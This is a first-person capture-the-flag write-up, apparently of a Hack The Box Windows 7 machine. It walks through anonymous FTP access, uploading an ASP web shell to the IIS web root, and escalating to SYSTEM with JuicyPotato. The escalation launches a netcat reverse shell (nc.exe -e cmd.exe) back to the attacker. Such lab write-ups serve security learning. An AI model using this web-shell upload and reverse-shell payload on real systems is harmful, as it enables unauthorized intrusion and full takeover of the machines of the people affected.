Initial Enumeration
I begin with an Nmap scan of the target with nmap -sC -sV -oA nmap/devel-initial -Pn
which returned:
Starting Nmap 7.94SVN ( ) at 2024-07-24 18:51 BST Nmap scan report for Host is up (0.025s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The Nmap scan showed that FTP was accepting anonymous logins and some files available. I logged in with ftp
and the username/password combo of anonymous
to see if any additional files were available but nothing else was found:
└─$ ftp Connected to 220 Microsoft FTP Service Name ( anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||49158|) 150 Opening ASCII mode data connection. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete.
The files that were available looked like they may be related to the directory of a webserver. Nmap showed that the target also had a webserver running on port 80 so I investigated if the two were linked.
I navigated to the IP address in Firefox and received the default IIS install page:
To see whether FTP was serving the files for the webserver, I created a poc.txt
file with the contents Test
. Using FTP, I uploaded the file with the put
ftp> put test.txt local: test.txt remote: test.txt 229 Entering Extended Passive Mode (|||49159|) 125 Data connection already open; Transfer starting. 100% |*********************************************| 6 54.75 KiB/s --:-- ETA 226 Transfer complete. 6 bytes sent in 00:00 (0.31 KiB/s)
I then tried to access this file in Firefox and was successful:
Now I knew it was possible to upload files to the target machine via FTP, my next step was to upload a webshell and try and get a reverse shell from the target machine.
I copied the /usr/share/webshells/asp/cmd-asp-5.1.asp
webshell to my working directory and named it shell.asp
cp /usr/share/webshells/asp/cmd-asp-5.1.asp ./shell.asp
I used FTP to upload this file and then navigated to the file in Firefox. The upload was successful so I ran the whoami
command to check it was working and I received the response iis apppool\web
I used the whoami /priv
command to check what privileges the user had:
PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeShutdownPrivilege Shut down the system Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled
I also ran the systeminfo
command to understand the configuration of the target machine:
Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 ££ System Boot Time: 28/7/2024, 5:44:26 ££ System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 3.071 MB Available Physical Memory: 2.496 MB Virtual Memory: Max Size: 6.141 MB Virtual Memory: Available: 5.574 MB Virtual Memory: In Use: 567 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection 4 DHCP Enabled: Yes DHCP Server: IP address(es) [01]: [02]: fe80::6d22:f191:68c2:c153 [03]: dead:beef::5a4:a62e:bcd:fc61 [04]: dead:beef::6d22:f191:68c2:c153
This revealed a few useful pieces of information about the target machine. Most notably is that it is a Windows 7 machine that has had no Hotfixes applied meaning that, in terms of updates, it was in a default state and likely vulnerable to a number of exploits. The user also has the seImpersonate
and seAssignPrimaryToken
privileges – all of these point to a potential privilege escalation route using a Potato
Privilege Escalation
There are a number of different potato
variations available for privilege escalation, with different ones available for different target configurations. More info on potato
techniques can be found here – – which advises that the JuicyPotato
varient was likely to be applicable in this instance.
Another key piece of information from the systeminfo
command was that the target machine was 32-bit meaning that a 32-bit version of the JuicyPotato
binary would need to be used.
A search revealed a 32-bit version of JuicyPotato
could be downloaded from Github and was available under the Releases
section here –
I downloaded the binary and renamed it to JuicyPotatox86.exe
The README for the exploit states that it should be executed as follows:
"JuicyPotatox86.exe" -l 4444 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
The flags are:
= The COM server listening port (can be set to any value but avoid common ports)-p
= The program to execute on the target machine-t
= Thecreateprocess
call to use to escalate privileges. This depends on the privileges that the user has – if the user has theSeImpersonate
privilege then then valueCreateProcessWithToken
should be used, if the user has theSeAssignPrimaryToken
privilege then the valueCreateProcessAsUser
should be used. If the user has both privileges then the value*
can be used to attempt both methods.-c
to be used. TheCLSID
is an identifier for aCOM Class Object
which is a key part of the process that makes the exploit work.
Next, I needed to decide what program I wanted to execute on the target machine. I could use an executable already on the target but, as I had the ability to upload files to the target machine via FTP, I could upload any executable that I wanted. I decided to upload a netcat binary and use this to create a reverse shell back to my attack machine. As the JuicyPotato
exploit should escalate me to SYSTEM
privileges, this reverse shell should be received as such.
A 32-bit netcat Windows binary is available on Kali at /usr/share/windows-resources/binaries/nc.exe
so I copied this to my working directory with cp /usr/share/windows-resources/binaries/nc.exe .
With the JuicyPotatox86.exe
and nc.exe
files in my working directory, I used FTP to upload these to the target machine. I logged in with anonymous
as above but, before uploading the files, I changed to binary mode by entering the command binary
– this ensures that binary files are transferred correctly and work as intended:
└─$ ftp Connected to 220 Microsoft FTP Service Name ( anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> binary 200 Type set to I. ftp> put JuicyPotatox86.exe local: JuicyPotatox86.exe remote: JuicyPotatox86.exe 229 Entering Extended Passive Mode (|||49162|) 125 Data connection already open; Transfer starting. 100% |**********************************************************************************************************************************************************| 257 KiB 1.09 MiB/s 00:00 ETA 226 Transfer complete. 263680 bytes sent in 00:00 (965.18 KiB/s) ftp> put nc.exe local: nc.exe remote: nc.exe 229 Entering Extended Passive Mode (|||49163|) 125 Data connection already open; Transfer starting. 100% |**********************************************************************************************************************************************************| 59392 974.00 KiB/s 00:00 ETA 226 Transfer complete. 59392 bytes sent in 00:00 (580.64 KiB/s) ftp> dir 229 Entering Extended Passive Mode (|||49164|) 150 Opening ASCII mode data connection. 03-18-17 02:06AM <DIR> aspnet_client 03-17-17 05:37PM 689 iisstart.htm 07-28-24 08:36PM 263680 JuicyPotatox86.exe 07-28-24 08:36PM 59392 nc.exe 07-28-24 07:33PM 1221 shell.asp 03-17-17 05:37PM 184946 welcome.png 226 Transfer complete.
With the binaries on the target, I then constructed my payload to receive my reverse shell:
C:\inetpub\wwwroot\JuicyPotatox86.exe -l 4444 -p cmd.exe -a "/c C:\inetpub\wwwroot\nc.exe 4444 -e cmd.exe" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
- FTP was sharing the web root folder so the binaries were located in
. The full path was used to avoid confusion - Although I had uploaded the netcat binary, executing the binary directly failed to return a reverse shell so
was used as the program to execute and the netcat string passed as a command forcmd.exe
to run. I passed my Kali IP address and port as arguments for netcat and use the-e
flag to tell netcat to executecmd.exe
which is what will give me my reverse shell - As seen, the
user had both priviliges so*
was passed as the-t
flag to try bothcreateprocess
methods - The
provided in the example from Github didn’t work – not all will work on all targets but a list of possible values can be found here – I worked my way through these until a valid one was found.
I created a netcat listener on my Kali machine with nc -lvnp 4444
I then used my payload in the webshell and received a shell as NT AUTHORITY\SYSTEM
└─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 49197 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
The user flag was found in the C:\Users\babis\Desktop
C:\Users\babis\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 137F-3971 Directory of C:\Users\babis\Desktop 11/02/2022 04:54 <DIR> . 11/02/2022 04:54 <DIR> .. 28/07/2024 05:46 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 4.692.209.664 bytes free C:\Users\babis\Desktop>type user.txt type user.txt c70**************************ea6
The root flag was found in the C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 137F-3971 Directory of C:\Users\Administrator\Desktop 14/01/2021 12:42 <DIR> . 14/01/2021 12:42 <DIR> .. 28/07/2024 05:46 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 4.692.250.624 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt 47f**************************ddf